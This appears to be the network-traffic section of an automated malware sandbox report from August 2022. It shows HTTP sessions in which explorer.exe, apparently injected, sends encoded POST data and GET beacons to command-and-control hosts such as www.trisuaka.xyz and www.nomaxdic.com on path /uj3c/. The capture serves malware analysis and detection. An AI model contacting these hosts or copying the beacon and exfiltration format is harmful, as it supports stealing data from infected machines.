                                                                                                                                        Data Raw: 72 34 53 30 50 3d 75 46 58 50 6c 70 76 6c 41 59 36 6e 34 46 6e 4d 51 32 63 47 63 43 41 35 37 69 73 39 4d 42 72 63 35 6c 42 68 4f 4a 41 31 44 39 30 30 70 66 47 2d 43 68 70 64 61 5f 39 69 4b 56 62 71 4f 76 34 4c 70 38 34 70 4e 30 45 76 59 7a 46 31 66 78 56 4d 63 50 33 66 57 6b 63 33 32 43 7a 32 32 6e 63 79 44 34 77 4c 52 44 44 37 61 5f 78 78 72 68 4d 43 35 64 61 71 79 34 72 79 47 65 6f 41 49 44 46 2d 55 38 64 61 73 63 77 63 6f 76 62 66 53 58 78 2d 28 55 4e 76 4d 4a 4e 54 73 74 56 45 45 6a 74 4c 78 6a 53 7a 64 6b 47 6c 71 2d 31 44 28 33 33 38 66 64 57 56 47 31 32 30 44 77 6e 72 70 6a 4f 50 76 78 52 45 6e 59 6e 70 65 54 6b 39 4e 31 66 63 61 72 4e 5f 70 5a 47 53 64 6c 33 55 4d 66 6b 78 62 68 75 51 35 43 43 64 65 48 51 31 7a 45 53 36 49 64 50 4d 43 71 69 30 7a 47 6b 6c 58 62 46 4a 4d 57 37 50 38 57 45 56 42 6b 5a 53 6f 43 72 6e 4a 32 61 6f 73 75 75 64 36 48 6e 46 34 77 6b 68 63 37 77 33 4f 38 68 39 63 77 53 53 66 77 73 5a 65 6e 63 48 31 7a 68 39 6a 68 62 4e 45 53 47 52 52 6a 45 62 75 52 4f 4c 33 51 39 74 65 49 68 46 38 79 31 73 78 68 43 68 44 6a 51 55 73 32 35 48 44 31 6a 55 65 6b 6c 52 4c 67 62 5f 37 56 5a 71 7a 49 42 73 50 39 5a 30 77 61 34 38 31 6a 68 71 56 79 32 58 42 69 54 4c 6e 4d 47 52 28 65 58 37 38 31 4f 5f 4d 63 44 44 63 66 6c 53 6a 56 6b 67 56 72 7a 56 67 4a 51 53 4b 64 76 34 37 51 77 65 73 53 38 4d 47 73 28 39 48 4e 64 4c 4b 6c 73 48 58 37 4e 54 6e 30 49 4e 37 6b 52 74 71 35 50 32 61 71 45 33 46 72 52 61 78 58 36 7a 47 52 31 30 61 47 36 44 33 5a 41 4f 4e 74 57 74 72 5f 70 43 35 48 57 32 6a 4c 54 53 73 44 66 65 47 5a 41 37 49 6a 30 67 68 53 31 78 6c 33 7a 4e 73 39 65 4c 57 59 6a 77 6b 47 46 33 70 35 67 66 56 4a 69 74 66 36 6a 7a 66 4b 50 6c 70 4d 57 48 31 4b 66 46 70 50 50 73 32 31 41 59 47 41 4f 73 4a 34 6d 58 33 6b 48 51 69 6a 74 41 45 70 53 4f 4c 71 75 69 64 35 56 31 41 62 4e 68 58 53 6e 5f 32 68 39 49 47 51 39 75 46 41 44 39 38 71 4b 70 79 62 5a 4e 30 35 4a 59 4e 31 38 4f 4b 61 4a 68 35 74 45 6e 44 35 6d 57 44 6c 49 66 79 58 33 57 71 41 44 52 43 76 67 6f 41 55 73 69 6e 6a 4f 31 4c 43 75 55 53 5a 65 77 6e 48 44 6c 6e 75 4c 74 32 4f 4c 39 47 30 6e 63 58 42 67 5f 57 34 66 33 76 39 45 34 69 33 57 62 65 59 55 64 50 6c 48 53 6e 72 6c 72 34 4e 45 47 76 4d 44 5f 53 69 5a 79 71 75 62 5f 61 6f 49 74 4b 56 6d 76 5a 65 78 74 6e 42 38 61 6a 30 6c 64 52 38 36 48 42 6a 39 48 6e 38 4b 59 42 2d 4c 77 65 78 79 68 32 50 32 58 6e 52 35 61 66 64 55 4b 33 41 64 50 72 2d 4e 74 7e 67 54 30 4d 30 79 68 48 6e 71 4b 4f 67 74 62 68 76 48 42 4b 4e 5a 77 63 47 78 2d 4f 71 4f 6e 72 35 58 6b 48 34 45 35 4b 51 59 4d 36 2d 7e 5f 52 79 35 54 74 6f 74 6e 6d 71 6c 45 51 67 34 4a 51 6b 5a 68 45 4b 53 75 59 4a 5a 4a 41 6a 63 55 45 61 36 51 4a 30 76 76 47 6a 65 6b 68 64 75 42 73 78 45 59 4c 64 4b 46 49 37 78 46 52 59 71 42 62 7a 57 30 6e 4e 59 6e 76 57 35 77 37 64 52 33 59 53 47 47 57 5f 6c 6f 30 61 4f 33 66 41 35 74 39 50 4f 66 4f 2d 30 6a 69 77 38 50 6f 58 4c 33 46 66 58 62 56 32 69 31 70 70 65 49 6a 41 63 47 5a 34 34 62 4b 35 51 70 68 6d 62 6b 77 37 4d 52 45 37 65 67 35 70 44 68 77 53 44 33 4f 4f 64 51 41 70 4c 49 62 69 4a 31 7e 43 4f 4a 6a 79 50 4c 6f 70 56 48 73 77 37 59 32 46 54 62 54 34 6d 69 52 71 50 2d 33 6c 57 33 76 6e 38 32 46 43 36 33 75 67 35 6a 73 65 34 68 59 4a 72 54 32 38 4b 73 45 77 50 72 66 6d 38 6c 54 38 70 32 77 62 76 6e 61 6e 71 41 69 61 62 41 4b 54 57 43 38 54 47 64 66 77 28 7a 35 34 6f 37 4d 5f 30 37 78 37 75 75 6f 70 37 51 39 6d 63 53 66 4a 77 73 61 39 69 6e 47 6d 63 5f 6c 35 65 73 31 65 6d 67 50 37 68 52 65 6f 5a 42 77 65 65 36 42 54 7a 44 66 5f 33 45 51 66 71 4a 6e 7a 65 68 78 61 43 43 30 74 69 6b 6f 77 44 79 38 35 61 35 53 79 6c 64 49 6c 55 78 78 61 28 43 6a 5a 42 52 6c 67 61 35 6c 48 51 48 56 39 55 72 4c 62 36 33 65 59 6d 33 67 4d 28 48 43 41 58 79 72 4c 43 4f 7a 57 36 62 61 61 50 45 57 30 71 2d 59 4e 6c 42 53 54 6c 35 62 72 55 4c 6f 5f 77 63 32 46 52 49 57 52 62 75 52 53 35 6c 46 56 30 39 74 71 75 6b 50 78 6a 65 62 36 41 66 4e 4d 72 64 4c 44 54 62 69 5f 6f 56 6a 35 39 38 72 67 6f 6b 70 6a 52 56 74 55 58 79 71 61 4b 67 49 6a 76 54 69 66 52 6c 5a 37 35 43 72 52 79 35 70 38 58 5a 51 76 47 4d 33 35 6d 41 32 64 47 51 38
                                                                                                                                        Data Ascii: r4S0P=uFXPlpvlAY6n4FnMQ2cGcCA57is9MBrc5lBhOJA1D900pfG-Chpda_9iKVbqOv4Lp84pN0EvYzF1fxVMcP3fWkc32Cz22ncyD4wLRDD7a_xxrhMC5daqy4ryGeoAIDF-U8dascwcovbfSXx-(UNvMJNTstVEEjtLxjSzdkGlq-1D(338fdWVG120DwnrpjOPvxREnYnpeTk9N1fcarN_pZGSdl3UMfkxbhuQ5CCdeHQ1zES6IdPMCqi0zGklXbFJMW7P8WEVBkZSoCrnJ2aosuud6HnF4wkhc7w3O8h9cwSSfwsZencH1zh9jhbNESGRRjEbuROL3Q9teIhF8y1sxhChDjQUs25HD1jUeklRLgb_7VZqzIBsP9Z0wa481jhqVy2XBiTLnMGR(eX781O_McDDcflSjVkgVrzVgJQSKdv47QwesS8MGs(9HNdLKlsHX7NTn0IN7kRtq5P2aqE3FrRaxX6zGR10aG6D3ZAONtWtr_pC5HW2jLTSsDfeGZA7Ij0ghS1xl3zNs9eLWYjwkGF3p5gfVJitf6jzfKPlpMWH1KfFpPPs21AYGAOsJ4mX3kHQijtAEpSOLquid5V1AbNhXSn_2h9IGQ9uFAD98qKpybZN05JYN18OKaJh5tEnD5mWDlIfyX3WqADRCvgoAUsinjO1LCuUSZewnHDlnuLt2OL9G0ncXBg_W4f3v9E4i3WbeYUdPlHSnrlr4NEGvMD_SiZyqub_aoItKVmvZextnB8aj0ldR86HBj9Hn8KYB-Lwexyh2P2XnR5afdUK3AdPr-Nt~gT0M0yhHnqKOgtbhvHBKNZwcGx-OqOnr5XkH4E5KQYM6-~_Ry5TtotnmqlEQg4JQkZhEKSuYJZJAjcUEa6QJ0vvGjekhduBsxEYLdKFI7xFRYqBbzW0nNYnvW5w7dR3YSGGW_lo0aO3fA5t9POfO-0jiw8PoXL3FfXbV2i1ppeIjAcGZ44bK5Qphmbkw7MRE7eg5pDhwSD3OOdQApLIbiJ1~COJjyPLopVHsw7Y2FTbT4miRqP-3lW3vn82FC63ug5jse4hYJrT28KsEwPrfm8lT8p2wbvnanqAiabAKTWC8TGdfw(z54o7M_07x7uuop7Q9mcSfJwsa9inGmc_l5es1emgP7hReoZBwee6BTzDf_3EQfqJnzehxaCC0tikowDy85a5SyldIlUxxa(CjZBRlga5lHQHV9UrLb63eYm3gM(HCAXyrLCOzW6baaPEW0q-YNlBSTl5brULo_wc2FRIWRbuRS5lFV09tqukPxjeb6AfNMrdLDTbi_oVj598rgokpjRVtUXyqaKgIjvTifRlZ75CrRy5p8XZQvGM35mA2dGQ88m0W88e~fVbtUI1z-Ao~-Gg0j2nW6zy3QMilVxk7itl9y5e2lTDsf4m8SHipV3ih8axhRCNIANXNImbSTCabMlNBD2gkBoiO21fR12iztlNZE6KAX~VYYEc6y(nTXDHtKj63nKqGZBf3JYoWoISqJEWci5yqH7t9TB1EJMo8tSPCu0zM71XfulJclcHre494zonq-t8hRg7GP29Hjj6nHfiHoIleqcDkwtC36BYID2Apcvft-pDGyFjObueQOcVNnPmH5NeZhe2VrlRUlnswzJ3rh45JfuWHo(DKGX-33nYsvW5Z2tzbrxk3mdoDEQNViqN1H~34jmJS70L5TWvS2jJFgg-Ve0qGlfYq0B9ijf_cAIyUkYJSlWazENn8rOkHptfh7H3y1bvTMtI(ywrw4bzM8g30QSZolOjETJHiU0q0DrntTISkzbkSexDAgedsKB_c2Nyb4~3CFf3fHblGlwY1m7bBa7WUT5k1NZCnQ86~tcDY6XTfAw3v8GQ8xjrLiz9XaycpNhoh0OKK5YKG1UXGD4ROUnTo8(czZkQvYwB9b0Emf9aHct1XjAOJGkpDiQTbV89kScU64K0xrxFy5MTdNiLmkkOAci7cls5qXl35HpOrXia1_p1e-Czs1GAUKGqQvxmq0HnfpkeN1DfU5k6TVWJTwGzniu6did44FSoL2lStXDY8x3KgyX_limSp2sfjc3Imno4ExBdae98UQETjigWxumGACPbzniKiomzeZ2RNAHFhGNuxdxI3NMqdjWgEw4KM2vdTbEYIUMA59v_~pqVQpgLyqpce6tiP8Lgah8O2soI7ml7lPWTFPCatlx_i3J86sgIz5Bi(s9okDt-Agw4gS(YbWe_h35c(_h2OouXQFJPyi~YItu_Fn0qvp8sGBPeksMEkyJrNwT9kI37IVOOZ294BNFZTzYQVqzS~5F9VVIIhV6dyQ3dcEWZyoaCZ0j2D7WTkd8Mc6YWPYaAqVRjXqwo3nHIJ9ajKrsemyPlqcrNQ6fGBt~oRGOZ6qkAh3moCP1Ty-n5epcLfOv9r8W_FB(QwoetKxZLJZysqnLUZViWBy(l5OEM8M8jMpxdfk8JsOc6D_BqnLLCwi~2xGCcgNcz(9eZ1arWMbj8VAkbqGy4cAFM6qCBM7Gse12I55rktYF8IIoMPkjZT4bQB2epbWZVvRQYRwgbCxemYdZ_Hrv1wI57EJsoX7c6qGGQRTgZmdUofFoMFMuJheh6oOlcb1zOCqkdyZfQg5DpGgucIq6qDL3bTdbhCacYIVaWjrRw5pnZRLscfj2167I5e1f_wQleQFk2uDbLPbxbJQDETCUKsUT_(vnIXLDX6vIoz6JaAIdZ5vOtV95sx0y161FglrqrDwXyk5Qhi50rcEq1ALUqZeh9zH2Yy_YgmI8ZxcTiaj~XmEEuDXCsRcIl8m7D9gN3FcdZamz-em7XH5ngLpWBnZRAOxt2u45p1QW642jUg7X27tALOJpBSU9j14q6LEcFTmpWD2ZBdbsLikB3Y8magYgwbi3VmTxX0FjLpvZlIU4nJzXJ9omqt58yQ8W6x7d7p1Z3SLOdzKUd6upk1ZKMTENvqwz2At5k5d5kITQQawT_krSc(wKpvKtus_XPD18dbBeWES1KxS8cSk~kKKEyXxMw15(umsiVGRUM39a7HWczWtL2wbm6aTHDo-vn0JuJzqk7W5aBDigz7XdEez2Xd_pgy_cb89bBPhPj(7jTMPFdFIDXvJeen6p4iAkfxkVv5AxL~dz38twi79eJnZ73bJ0YTnOw8jkCucbMT-Q0wcsD7gYOCqUmWshoSPuFpLlaHHVbx8VYtni-HShBtpZ252xnImj05T81n29Guov8Tt70VPBxMns2PjHdsTTt4f(v53RbFZK_5fsBlRe_5a2plLPBTB3qoN1zQWY6pJJ-AntmcKW9p0bHW-(vPkqPp_(ZWRry9NVUlsQ1DuCM65Yac2b-8M4tWZh99HLoQsljYXAXtpSdGm3wlNvGIFGOxdvHwhZGam1wMgYnq_iuxCRP9JID6O2zRrc4Zto2(-K5DRt57x0tPRzfO6jvtyY5b5c2He5DrddMIsWHM8TXq8vkN7mVU3AwaqW6cYsK2SJlImCqT5z1sQ~kz2vP1TgNff~pWvzYfhCvWK6c1iVsosePVfagNTOd6tG1G_gSAa9dLGjfim9gn5cOWf~vHzjKFXu4XTBE6SrsXx~CpSyYtUgnVwSPn6(0vJOaM1TrO4QESE50S0YxFc5V~JnDsccpIkENx1a2CDE3hXUq3CXC3PokCzwMrLnnd0HhAe7GEmJ2GqLoLkw93AxrA2EGS-WQ4zQvv0ICCxYqZowXb8k0Q78PFQ6tYBIROY~mHTKADaSTVChnX6xak4~gaEdP(O7-lXiYztVRZ3BAhMqQe9wc(jfUKTTtgInnOPWSW12doSEb0g8pZLVSsESew3fihaYnmXc4VBs5hSO3mbjXuI(m1vLH3ZSQMLArT74t8aiIq7tkCdPy2EnLWgByg42kRrO5l_aLgOQJsYlCJCw-htQzeyROJlQfsFP52rQY7Lf4OhomA3OayesfHe5KEGDV4SxzyoapN435nDxbEglpxzAHUvOx1xMKCJhcbOfwdxFWLo0cCRIfO9aVMNHxBO3KA2PgiM5_XZwqU932(dJu(3PKmn0BO_sANQsc4q(mHRLOQJiwCkN3AF6_oLI4hpiO~H8cEeVAdwT_
                                                                                                                                        Aug 8, 2022 20:15:34.594914913 CEST10124OUTData Raw: 72 61 57 44 42 5a 55 56 75 2d 33 4d 46 58 75 52 4a 70 62 39 47 4f 4d 52 4c 36 41 73 51 55 79 68 37 4d 61 4a 32 59 35 44 46 6f 69 37 71 75 50 6e 54 39 73 2d 6d 35 48 2d 6f 63 70 6a 38 4e 6f 61 39 63 65 75 66 6a 44 4c 45 6a 64 45 4c 32 4e 6f 34 72
                                                                                                                                        Data Ascii: raWDBZUVu-3MFXuRJpb9GOMRL6AsQUyh7MaJ2Y5DFoi7quPnT9s-m5H-ocpj8Noa9ceufjDLEjdEL2No4r81pzNYdRTyQ7LPEkzKb51dV1NpNjm5gWoR4VE7RxqoLFYnLS3YJdCJ88J3nsmou4eocvDnFs6KV-(GCUVh(3k70hGCrVBJHThy49y8VHiK9HcxEm5IlWLy9KuObVXCxBj1tf3MmAnrmz2G8K1eKHP-CzPgAGhnHhi
                                                                                                                                        Aug 8, 2022 20:15:34.595010042 CEST10135OUTData Raw: 4b 71 73 45 6d 6f 64 7a 54 57 6d 52 61 38 4d 71 63 49 62 35 78 48 36 57 41 57 6e 35 66 33 63 55 66 74 55 30 6e 48 6a 4f 6b 61 4c 35 77 34 49 32 31 6f 63 53 44 32 64 53 73 69 32 72 6b 46 41 4d 35 62 6c 48 68 33 4c 33 6d 30 44 61 63 71 34 73 79 6a
                                                                                                                                        Data Ascii: KqsEmodzTWmRa8MqcIb5xH6WAWn5f3cUftU0nHjOkaL5w4I21ocSD2dSsi2rkFAM5blHh3L3m0Dacq4syjRFAoWu5dBz2Qc9irSlAsgRKryQfLDIJ2XGLbDFLh~KVvjo9CrchAy5TWm5ayqJFECZragKK1LIai8DH_Cz9tqq(LW1Pa(l6ul33U3GMSYaftoEsBS6UW9guO5szCG-kskgdmX9JsyoyDE5l1HGNHol2yfAydQm0Kb
                                                                                                                                        Aug 8, 2022 20:15:34.595067024 CEST10142OUTData Raw: 51 6a 76 61 53 46 51 2d 4b 43 54 75 76 53 30 31 45 34 6b 5f 53 74 56 72 76 74 44 43 37 66 4d 36 7a 47 31 47 57 68 6a 78 70 6a 66 72 6e 31 66 30 75 61 77 5a 57 52 45 6b 66 73 65 37 33 75 43 44 71 6d 53 6f 36 56 55 2d 6b 4c 70 38 49 6c 28 54 54 6f
                                                                                                                                        Data Ascii: QjvaSFQ-KCTuvS01E4k_StVrvtDC7fM6zG1GWhjxpjfrn1f0uawZWREkfse73uCDqmSo6VU-kLp8Il(TToW0ag6omOTbQ-iSz6Hf47PxnjHWJIdaGLNiSCzYZ4xl3ioRAhfOdCUszYDx~F0cvIwsGVT2PP(g2h4S4w3Lm61qFA0o4CUh1p7ag5tzvFNGoDvYRH(EFDRpnlPAtztWETBLjDbbCf2buuvJN5H_dsbpgUpRvvbnRuL
                                                                                                                                        Aug 8, 2022 20:15:34.612741947 CEST10144INHTTP/1.1 301 Moved Permanently
                                                                                                                                        Date: Mon, 08 Aug 2022 18:15:34 GMT
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                        Expires: Mon, 08 Aug 2022 19:15:34 GMT
                                                                                                                                        Location: https://www.trisuaka.xyz/uj3c/
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WbuXodLAioqthRl4ygjUnLRL7D3kei2Prn53sKFcoWFCEV0WvXKnC96SlQLKyOqFz75anLMWiBcXP5yq8HFEVbCIjVRSJu%2FS4SzuFeeQMMIkmTbdTDJdctm3LB14lcZtPGoJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 737a3cf92bbc9040-FRA
                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        16192.168.2.349858188.114.97.380C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:15:34.595506907 CEST10142OUTGET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1
                                                                                                                                        Host: www.trisuaka.xyz
                                                                                                                                        Connection: close
                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii:
                                                                                                                                        Aug 8, 2022 20:15:34.628506899 CEST10145INHTTP/1.1 301 Moved Permanently
                                                                                                                                        Date: Mon, 08 Aug 2022 18:15:34 GMT
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: close
                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                        Expires: Mon, 08 Aug 2022 19:15:34 GMT
                                                                                                                                        Location: https://www.trisuaka.xyz/uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=92KWEFhBSRwmsypwogEsRGtYR2gRw749njRIjBDsGdPBDWDeaD3V0816lyOTlBBw4FmjMChsK%2FkYtyhrKrYAfbCkmnCjrFUtbGGI7oRkq51FXTIGb8jjg%2BT8V%2BLxgX%2B6x%2BId"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 737a3cf93dff9b9a-FRA
                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        17192.168.2.34985938.54.163.5780C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:15:40.151515961 CEST10146OUTPOST /uj3c/ HTTP/1.1
                                                                                                                                        Host: www.nomaxdic.com
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 411
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Origin: http://www.nomaxdic.com
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Accept: */*
                                                                                                                                        Referer: http://www.nomaxdic.com/uj3c/
                                                                                                                                        Accept-Language: en-US
                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                        Data Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii: r4S0P=vFqnDJb8JKSmv0JErBdW6T0duZFUP0EWmA9MUe7IVgz_YeSnoptSwksnDI7KefwwkZJ6wgfIneChzXpuwm1YuqQAicsvbUPraRL7GXnPzoTCCERY1N3S1gwASHA6Kuvj3sh8qH9oENHHwVWyiDiH9iv2WxWRjGvjDljL4jJMCLWEtijiLDGFfJghT_zJzqivez33LUGrw49Stit-6JSKhV7TkYaC3sbNvSNIfOD3Uvv5tIEnQ1SuSVq7zrdcuMmLy2Z2i4oTpgHmFg3YXlEXa-3W0gp9m344(gKBxmIZNX7Qn24ly9ZqESNuqTj7iqHsN_U4iCZlLeatS98-(PnhMESxRyQnn5hyUXNuc0~QQSNRjto6vRgjFQHDlp5tahHD0lcjiXy7RLE6UaurUQ).


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        18192.168.2.34986038.54.163.5780C:\Windows\explorer.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Aug 8, 2022 20:15:40.343843937 CEST10155OUTPOST /uj3c/ HTTP/1.1
                                                                                                                                        Host: www.nomaxdic.com
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 36479
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Origin: http://www.nomaxdic.com
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                        Accept: */*
                                                                                                                                        Referer: http://www.nomaxdic.com/uj3c/
                                                                                                                                        Accept-Language: en-US
                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                        Data Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 6f 54 62 7e 64 70 39 63 48 58 41 48 32 28 49 7e 4d 31 46 7a 48 69 74 48 58 49 6f 36 6f 51 65 54 38 6b 47 79 65 62 6b 4e 63 63 74 70 56 6c 4c 65 45 6f 74 53 78 39 55 68 6c 33 30 32 77 75 30 6c 34 6e 37 63 6d 59 67 42 51 72 36 73 4d 7a 77 37 4a 6b 67 32 59 42 43 7a 7a 67 68 5a 50 47 6a 75 55 6d 42 6a 35 52 6d 30 42 72 33 51 4d 55 61 6e 4b 71 54 76 59 76 55 64 49 73 4d 45 74 56 43 65 2d 6b 42 58 54 65 44 4b 64 44 66 74 62 78 63 64 66 68 36 45 68 54 6d 6e 51 34 65 71 49 63 6b 78 4d 38 30 51 62 77 45 4f 66 38 67 34 73 53 50 4f 52 39 62 51 44 78 33 61 38 73 7a 54 30 69 73 70 4f 31 4a 30 65 5a 70 43 56 58 37 36 49 4e 52 69 34 46 30 77 76 67 6b 36 30 6f 48 51 5a 45 62 6b 50 57 58 71 6d 32 62 50 50 54 32 49 41 6c 53 77 61 67 68 76 39 4f 48 6d 53 79 6b 59 7a 51 69 4f 74 4a 67 6f 6a 73 5f 6d 6d 57 6c 4c 71 6c 61 79 53 7e 47 64 76 71 52 59 78 75 4f 56 79 47 75 47 52 79 69 35 6c 68 6f 77 64 68 62 65 36 41 65 57 6e 56 73 66 63 77 50 35 46 6e 61 4d 4f 30 6d 28 5f 6c 5f 52 54 63 67 6e 79 4d 31 47 4d 55 7a 77 76 38 52 50 35 31 4c 71 51 66 35 45 47 74 62 6b 71 48 4f 63 6b 51 4b 44 65 77 5a 67 44 78 73 4d 5f 44 71 72 41 49 2d 4a 4f 65 6f 49 63 6e 37 57 46 61 49 67 76 42 59 51 46 68 55 34 41 68 48 7e 44 65 68 7e 58 49 51 6b 43 68 5f 34 59 74 36 4e 39 59 4d 78 68 61 34 36 63 6d 46 36 6e 65 76 79 51 4a 69 37 4e 73 2d 61 74 4c 52 54 7a 42 5f 42 44 57 38 73 62 6f 71 52 59 4f 4e 75 64 4e 62 4c 70 73 47 34 41 49 4b 35 68 4f 58 57 45 51 77 65 66 4e 65 58 5f 59 70 47 66 6e 6a 70 6a 35 73 58 55 5a 2d 46 79 51 6e 37 42 68 4f 57 44 6d 53 36 4d 75 58 68 52 58 6c 58 52 62 53 66 4c 65 41 41 4a 44 6e 49 48 52 78 69 5f 78 33 45 79 58 55 67 2d 58 6e 68 6d 4a 32 43 69 6d 43 6f 57 35 51 56 4d 44 4d 57 65 4c 70 57 6c 58 34 74 56 54 4d 59 38 66 68 65 35 53 6f 28 42 47 58 69 55 38 31 71 64 5a 54 6e 43 77 48 65 64 6f 2d 30 6f 78 58 41 2d 4a 7a 6d 73 51 47 59 4e 56 78 48 58 51 75 6d 42 78 58 55 74 66 56 45 44 30 7a 33 31 6c 75 74 59 62 4e 66 78 75 6b 77 67 38 73 42 41 7e 4a 64 32 33 51 67 59 67 47 76 53 64 39 36 6f 52 57 6f 69 67 55 42 77 47 52 79 30 30 71 36 2d 52 33 64 6e 43 38 41 6c 4a 48 